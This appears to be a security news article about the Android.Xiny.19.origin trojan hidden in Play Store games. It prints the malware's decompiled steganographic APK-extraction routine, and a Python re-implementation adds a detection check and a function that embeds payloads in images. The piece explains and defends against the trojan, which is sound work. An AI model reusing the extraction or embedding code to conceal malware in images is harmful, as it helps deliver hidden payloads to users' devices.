Researcher Found Dozens of Games on Google PlayStore Infected By Trojan

Russian anti-virus company Dr Web published a blog post about Android.Xiny.19.origin, malware which has incorporated itself into more than 60 Android-based games developed by Conexagon Studio, Fun Color Games, BILLAPPS, and some 30 other companies. 

This new Android trojan that has targeted dozens of games in the official Google Play Store relies on steganography to dynamically run arbitrary APK files.

If you have downloaded and used Android games from these developers on your device, then this part might frighten you slightly.

The Trojan is designed to download, install, and run programs upon receiving a command from cybercriminals. Besides, it can display annoying advertisements.

The infection begins as soon as the user starts playing the game; from that moment the Trojan is performing its malicious activity.

Android.Xiny.19.origin

Android.Xiny.19.origin sends the following information to the command and control server:
  • IMEI identifier
  • IMSI identifier
  • Information about the mobile operator
  • Presence of a memory card in a device
  • Country
  • Language
  • MAC address
  • Version of the operating system
  • Package name and a version of an application that the Trojan is incorporated into
  • Presence of the malicious application in the system folder
The Trojan can execute the following actions:
  • Displays annoying advertisements
  • Downloads applications and prompts a user to install various software
  • Installs and deletes programs if root access is available on a device
  • Launches arbitrary apk files hidden in images received from the C&C server
The way apk files are launched looks as follows: Android.Xiny.19.origin downloads a specially created image, which contains the corresponding file object hidden with the help of steganography, from the server. Then the Trojan retrieves the apk file using a special algorithm:

```java
package com.wch.c_direct.encrypt.logic;

import android.graphics.Bitmap;
import android.graphics.BitmapFactory;
import com.wch.c_direct.logic.a;
import java.io.InputStream;
import java.util.Arrays;

public final class BitmapDecryptor {
    public static byte[] decrypt(InputStream inputStream) {
        int i5;
        int i = 4;   // size of the length header, in bytes
        int i1 = 8;  // number of 4-bit values (nibbles) that make up the header
        a.a();
        Bitmap bitmap0 = BitmapFactory.decodeStream(inputStream);
        bitmap0.setHasAlpha(true);
        // Pass 1: walk the pixels row by row, taking the low nibble of the
        // R, G and B channel of each one, until the 8 header nibbles are read.
        byte[] buffer1 = new byte[i1];
        int i2 = 0;
        int i3 = 0;
        int i4 = 0;
        while(i2 < buffer1.length) {
            i5 = bitmap0.getPixel(i4, i3);
            buffer1[i2] = ((byte)(i5 >> 16 & 15));
            if(i2 + 1 < i1) {
                buffer1[i2 + 1] = ((byte)(i5 >> 8 & 15));
            }
            if(i2 + 2 < i1) {
                buffer1[i2 + 2] = ((byte)(i5 & 15));
            }
            ++i4;
            if(i4 == bitmap0.getWidth()) {
                ++i3;
                i4 = 0;
            }
            i2 += 3;
        }
        // Pack the 8 nibbles into 4 bytes and read them as a big-endian
        // length; the length counts the header itself as well as the payload.
        byte[] buffer2 = BitmapDecryptor.a(buffer1);
        i2 = 0;
        i3 = 0;
        while(i2 < i) {
            i3 = i3 << 8 | buffer2[i2] & 255;
            ++i2;
        }
        // Pass 2: start again at pixel (0,0) and read two nibbles per byte
        // for the whole declared length.
        buffer1 = new byte[i3 * 8 / 4];
        i2 = 0;
        i3 = 0;
        i4 = 0;
        while(i2 < buffer1.length) {
            i5 = bitmap0.getPixel(i4, i3);
            buffer1[i2] = ((byte)(i5 >> 16 & 15));
            if(i2 + 1 < buffer1.length) {
                buffer1[i2 + 1] = ((byte)(i5 >> 8 & 15));
            }
            if(i2 + 2 < buffer1.length) {
                buffer1[i2 + 2] = ((byte)(i5 & 15));
            }
            ++i4;
            if(i4 == bitmap0.getWidth()) {
                ++i3;
                i4 = 0;
            }
            i2 += 3;
        }
        byte[] decrypted = BitmapDecryptor.a(buffer1);
        bitmap0.recycle();
        // Drop the 4-byte length header; what remains is the hidden apk.
        return Arrays.copyOfRange(decrypted, i, decrypted.length);
    }

    // Joins consecutive nibble pairs into bytes, high nibble first.
    private static byte[] a(byte[] inBuffer) {
        a.a();
        byte[] outBuffer = new byte[inBuffer.length / 2];
        int i;
        for(i = 0; i < outBuffer.length; ++i) {
            int i1;
            for(i1 = 0; i1 < 2; ++i1) {
                outBuffer[i] = ((byte)(outBuffer[i] << 4 | inBuffer[i * 8 / 4 + i1]));
            }
        }
        return outBuffer;
    }
}
```
After that, the malicious application loads the file into RAM of the infected device using the DexClassLoader class.
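As an added illustration (not code from Dr.Web's post or from the Trojan itself), the same extraction routine rewritten in Python, plus a ZIP-magic check an analyst can run over suspect images to see whether their low nibbles decode to an APK. The image is modelled as a width and a flat list of packed 0xRRGGBB pixels so no image library is needed, and embed_for_test only builds a constructed fixture for the test.

```python
import struct

ZIP_MAGIC = b"PK\x03\x04"  # APK files are ZIP archives

def _nibbles(pixels, width, count):
    """Read `count` 4-bit values: low nibble of R, G, B per pixel, row-major."""
    out, x, y = [], 0, 0
    while len(out) < count:
        idx = y * width + x
        if idx >= len(pixels):
            raise ValueError("image too small for the declared payload")
        for shift in (16, 8, 0):          # R, G, B, like the three getPixel masks
            if len(out) < count:
                out.append((pixels[idx] >> shift) & 0x0F)
        x += 1
        if x == width:                    # wrap to the next row, as the Java does
            x, y = 0, y + 1
    return out

def _pack(nibbles):
    """Join nibble pairs into bytes, high nibble first (BitmapDecryptor.a)."""
    return bytes((nibbles[i] << 4) | nibbles[i + 1] for i in range(0, len(nibbles) - 1, 2))

def extract_payload(pixels, width):
    """Mirror of decrypt(): 4-byte big-endian length (counting itself), then data."""
    total = struct.unpack(">I", _pack(_nibbles(pixels, width, 8)))[0]
    if total < 4:
        raise ValueError("implausible length header")
    return _pack(_nibbles(pixels, width, total * 2))[4:]

def looks_like_apk(pixels, width):
    """Defender-side check: do the low nibbles decode to a ZIP/APK container?"""
    try:
        return extract_payload(pixels, width).startswith(ZIP_MAGIC)
    except ValueError:
        return False

def embed_for_test(payload, width, height):
    """Constructed fixture only: inverse of extract_payload over a black image."""
    body = struct.pack(">I", len(payload) + 4) + payload
    nibs = [n for b in body for n in ((b >> 4) & 0xF, b & 0xF)]
    if len(nibs) > width * height * 3:
        raise ValueError("payload does not fit in the image")
    nibs += [0] * (-len(nibs) % 3)
    pixels = [0] * (width * height)
    for i in range(0, len(nibs), 3):
        pixels[i // 3] = (nibs[i] << 16) | (nibs[i + 1] << 8) | nibs[i + 2]
    return pixels
```

Because only the low nibble of each channel is used, the high nibbles (and so the visible picture) can be anything, which is why a sanity check on the decoded length and magic bytes, rather than the image's appearance, is what flags a carrier.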


For now, Dr.Web says that Google has been notified about the issue, but the apps it reported as infected with Android.Xiny have not yet been taken down.
So users should be careful before downloading any apps from the Play Store unless they have an anti-virus program installed on their device.

Source: Dr.Web